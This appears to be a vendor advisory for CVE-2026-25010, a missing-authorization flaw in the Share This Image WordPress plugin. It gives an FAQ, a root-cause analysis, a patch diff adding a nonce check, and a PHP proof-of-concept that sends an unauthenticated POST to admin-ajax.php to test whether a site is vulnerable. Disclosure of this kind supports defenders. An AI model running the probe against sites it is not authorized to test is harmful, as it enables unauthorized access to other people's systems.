What is CVE-2026-25010?

CVE-2026-25010 is a vulnerability in the Share This Image plugin for WordPress, identified as a Missing Authorization flaw. It allows unauthenticated attackers to perform unauthorized actions via the plugin’s AJAX handler due to a lack of capability checks.

How does the vulnerability work?

The vulnerability allows attackers to send crafted POST requests to the WordPress site’s admin-ajax.php endpoint without authentication. The request can trigger the plugin’s shortlink generation functionality, which should only be accessible to authenticated users.

Who is affected by this vulnerability?

Any WordPress site using the Share This Image plugin version 2.09 or earlier is affected. Administrators should check their plugin version in the WordPress admin panel to determine if they need to take action.

How can I check if my site is vulnerable?

To check if your site is vulnerable, navigate to the Plugins section in your WordPress admin dashboard and look for the Share This Image plugin. If the version is 2.09 or earlier, your site is vulnerable.

How can I fix or mitigate the issue?

To fix the vulnerability, update the Share This Image plugin to version 2.10 or later, where the missing authorization checks have been implemented. Regularly updating plugins is essential for maintaining site security.

What does the severity rating of 'Medium' mean?

The Medium severity rating, with a CVSS score of 5.3, indicates a moderate risk to affected systems. While exploitation is possible, it requires specific conditions and does not guarantee severe consequences, but it still warrants attention.

What are the potential impacts of this vulnerability?

Successful exploitation could lead to unauthorized data processing, information disclosure through error messages, or excessive resource consumption on the server. It may also serve as a stepping stone for further attacks.

What is a proof of concept (PoC)?

A proof of concept is a demonstration that shows how the vulnerability can be exploited. In this case, the PoC provided illustrates how an attacker can send a crafted request to the vulnerable AJAX endpoint to invoke unauthorized actions.

How does the PoC demonstrate the vulnerability?

The PoC script shows how to send a POST request to the vulnerable endpoint with the necessary parameters. It highlights that no authentication is needed, which underscores the severity of the missing authorization check.

What should I do if I cannot update the plugin immediately?

If immediate updates are not possible, consider disabling the Share This Image plugin until a fix can be applied. Additionally, monitor your site for any suspicious activity that could indicate exploitation attempts.

Are there any other security best practices to follow?

In addition to updating plugins, implement security measures such as using strong passwords, enabling two-factor authentication, and regularly backing up your site. Consider using a web application firewall for added protection.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : March 18, 2026

CVE-2026-25010: Share This Image <= 2.09 – Missing Authorization (share-this-image)

CVE ID CVE-2026-25010

Plugin share-this-image

Severity Medium (CVSS 5.3)

CWE 862

Vulnerable Version 2.09

Patched Version 2.10

Disclosed January 24, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-25010:
This vulnerability is a Missing Authorization flaw in the Share This Image WordPress plugin, affecting all versions up to and including 2.09. The vulnerability allows unauthenticated attackers to perform unauthorized actions via the plugin’s AJAX handler, leading to a moderate security risk with a CVSS score of 5.3.

Atomic Edge research identifies the root cause in the `STI_Shortlink::ajax_process()` method within the file `share-this-image/includes/class-sti-shortlink.php`. The function processes AJAX requests for shortlink generation without performing any capability or authorization checks. The vulnerable code path begins when an unauthenticated user sends a POST request to `/wp-admin/admin-ajax.php` with the `action` parameter set to `sti_shortlinks`. The function directly processes the `hash` and `link` parameters from the POST data, as shown in the diff at lines 77-84 of the patched version, where the missing check existed before the patch.

Exploitation requires an attacker to send a crafted POST request to the WordPress site’s `admin-ajax.php` endpoint. The request must include the following parameters: `action=sti_shortlinks`, `hash=[sanitized_key]`, and `link=[target_url]`. No authentication cookies or nonce tokens are required. Attackers can automate this request to interact with the plugin’s shortlink generation functionality, which is intended only for authenticated users.

The patch adds a nonce verification check to the `STI_Shortlink::ajax_process()` method. The fix introduces two changes. First, in `share-this-image/includes/class-sti-functions.php` at line 155, the plugin generates a nonce named `sti_shortlinks` and passes it to the client-side JavaScript via the `sti_vars` array. Second, in `share-this-image/includes/class-sti-shortlink.php` at lines 77-80, the `ajax_process()` method now validates this nonce using `wp_verify_nonce()`. If the nonce is missing or invalid, the function returns a JSON error with a 403 status. This ensures the request originates from a legitimate plugin context with proper authorization.

Successful exploitation allows unauthenticated attackers to invoke the plugin’s shortlink generation AJAX handler. While the exact impact of this unauthorized action depends on the internal logic of the `STI_Shortlink::ajax_process()` method, typical consequences include unauthorized data processing, potential information disclosure through error messages, or consumption of server resources. The vulnerability could also serve as an entry point for chaining with other flaws.

Differential between vulnerable and patched code

Code Diff

--- a/share-this-image/includes/admin/class-sti-admin-options.php
+++ b/share-this-image/includes/admin/class-sti-admin-options.php
@@ -217,7 +217,7 @@
                         'mobile'  => 'true'
                     ),
                     "twitter" => array(
-                        'name'    => __( "Twitter", "share-this-image" ),
+                        'name'    => __( "X", "share-this-image" ),
                         'desktop' => 'true',
                         'mobile'  => 'true'
                     ),
@@ -346,8 +346,8 @@
             );

             $options['general'][] = array(
-                "name"  => __( "Twitter via", "share-this-image" ),
-                "desc"  => __( "Set twitters 'via' property.", "share-this-image" ),
+                "name"  => __( "X via", "share-this-image" ),
+                "desc"  => __( "Set X 'via' property.", "share-this-image" ),
                 "id"    => "twitter_via",
                 "value" => '',
                 "type"  => "text"
--- a/share-this-image/includes/class-sti-functions.php
+++ b/share-this-image/includes/class-sti-functions.php
@@ -155,6 +155,7 @@

             $sti_vars = array(
                 'ajaxurl'      => admin_url( 'admin-ajax.php' ),
+                'nonce'        => wp_create_nonce('sti_shortlinks'),
                 'homeurl'      => home_url( '/' ),
                 'selector'     => $selector,
                 'title'        => stripslashes( $settings['title'] ),
--- a/share-this-image/includes/class-sti-shortlink.php
+++ b/share-this-image/includes/class-sti-shortlink.php
@@ -77,6 +77,10 @@
                 define( 'DOING_AJAX', true );
             }

+            if ( empty($_POST['nonce']) || ! wp_verify_nonce( $_POST['nonce'], 'sti_shortlinks' ) ) {
+                wp_send_json_error( array( 'message' => 'Invalid nonce' ), 403 );
+            }
+
             $hash = sanitize_key( $_POST['hash'] );
             $link = $_POST['link'];

--- a/share-this-image/share-this-image.php
+++ b/share-this-image/share-this-image.php
@@ -3,7 +3,7 @@
 /*
 Plugin Name: Share This Image
 Description: Allows you to share in social networks any of your images
-Version: 2.09
+Version: 2.10
 Author: ILLID
 Author URI: https://share-this-image.com/
 Text Domain: share-this-image
@@ -14,7 +14,7 @@
     exit;
 }

-define( 'STI_VER', '2.09' );
+define( 'STI_VER', '2.10' );


 define( 'STI_DIR', dirname( __FILE__ ) );

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-25010 - Share This Image <= 2.09 - Missing Authorization
<?php

$target_url = 'https://vulnerable-wordpress-site.com';

// The vulnerable AJAX endpoint
$ajax_url = $target_url . '/wp-admin/admin-ajax.php';

// The action parameter that triggers the vulnerable function
$post_data = [
    'action' => 'sti_shortlinks',
    'hash'   => 'examplehash123', // This would be a sanitized key from the plugin's context
    'link'   => 'https://example.com/image.jpg'
];

// Initialize cURL
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $ajax_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($post_data));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);

// Execute the request
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

// Analyze the response
if ($http_code === 200 && strpos($response, 'Invalid nonce') === false) {
    echo "[+] Vulnerability likely EXISTS. Received HTTP 200 without nonce error.n";
    echo "[+] Response: " . htmlspecialchars($response) . "n";
} elseif ($http_code === 403 && strpos($response, 'Invalid nonce') !== false) {
    echo "[-] Vulnerability likely PATCHED. Received HTTP 403 with nonce error.n";
} else {
    echo "[?] Unexpected response. HTTP Code: $http_coden";
    echo "[?] Response: " . htmlspecialchars($response) . "n";
}

?>

Frequently Asked Questions

What is CVE-2026-25010?
Understanding the vulnerability
CVE-2026-25010 is a vulnerability in the Share This Image plugin for WordPress, identified as a Missing Authorization flaw. It allows unauthenticated attackers to perform unauthorized actions via the plugin’s AJAX handler due to a lack of capability checks.
How does the vulnerability work?
Mechanism of exploitation
The vulnerability allows attackers to send crafted POST requests to the WordPress site’s admin-ajax.php endpoint without authentication. The request can trigger the plugin’s shortlink generation functionality, which should only be accessible to authenticated users.
Who is affected by this vulnerability?
Identifying vulnerable installations
Any WordPress site using the Share This Image plugin version 2.09 or earlier is affected. Administrators should check their plugin version in the WordPress admin panel to determine if they need to take action.
How can I check if my site is vulnerable?
Verifying plugin version
To check if your site is vulnerable, navigate to the Plugins section in your WordPress admin dashboard and look for the Share This Image plugin. If the version is 2.09 or earlier, your site is vulnerable.
How can I fix or mitigate the issue?
Applying the necessary patch
To fix the vulnerability, update the Share This Image plugin to version 2.10 or later, where the missing authorization checks have been implemented. Regularly updating plugins is essential for maintaining site security.
What does the severity rating of 'Medium' mean?
Understanding risk levels
The Medium severity rating, with a CVSS score of 5.3, indicates a moderate risk to affected systems. While exploitation is possible, it requires specific conditions and does not guarantee severe consequences, but it still warrants attention.
What are the potential impacts of this vulnerability?
Consequences of exploitation
Successful exploitation could lead to unauthorized data processing, information disclosure through error messages, or excessive resource consumption on the server. It may also serve as a stepping stone for further attacks.
What is a proof of concept (PoC)?
Demonstrating the vulnerability
A proof of concept is a demonstration that shows how the vulnerability can be exploited. In this case, the PoC provided illustrates how an attacker can send a crafted request to the vulnerable AJAX endpoint to invoke unauthorized actions.
How does the PoC demonstrate the vulnerability?
Technical details of the PoC
The PoC script shows how to send a POST request to the vulnerable endpoint with the necessary parameters. It highlights that no authentication is needed, which underscores the severity of the missing authorization check.
What should I do if I cannot update the plugin immediately?
Temporary mitigation strategies
If immediate updates are not possible, consider disabling the Share This Image plugin until a fix can be applied. Additionally, monitor your site for any suspicious activity that could indicate exploitation attempts.
Are there any other security best practices to follow?
Enhancing overall security
In addition to updating plugins, implement security measures such as using strong passwords, enabling two-factor authentication, and regularly backing up your site. Consider using a web application firewall for added protection.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations